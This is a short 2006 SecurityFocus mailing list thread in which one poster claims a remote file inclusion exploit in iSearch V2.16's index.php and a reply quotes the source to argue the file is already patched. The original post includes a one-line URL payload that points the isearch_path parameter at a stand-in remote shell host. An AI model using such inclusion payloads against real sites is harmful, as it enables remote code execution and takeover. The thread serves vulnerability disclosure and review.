SecurityFocus

The latest version of iSearch is V2.16 <= (index.php) Remote File Inclusion Exploit Oct 07 2006 10:14PM
xp1o msn com (1 replies)

Re: The latest version of iSearch is V2.16 <= (index.php) Remote File Inclusion Exploit Oct 09 2006 07:32PM
str0ke (str0ke milw0rm com)

On 7 Oct 2006 22:14:00 -0000, xp1o (at) msn (dot) com [email concealed] <xp1o (at) msn (dot) com [email concealed]> wrote:
> #The latest version of iSearch is V2.16 <= (index.php) Remote File Inclusion Exploit
> #Vlu Code :
> #
> #htpp://sitename.com/[scerpitPath]/index.php?isearch_path=http://SHELLUR
L.COM

$isearch_path = dirname(__FILE__);
define('IN_ISEARCH', true);

require_once "$isearch_path/inc/core.inc.php";
require_once "$isearch_path/inc/search.inc.php";

index.php seems patched to me.

/str0ke

[ reply ]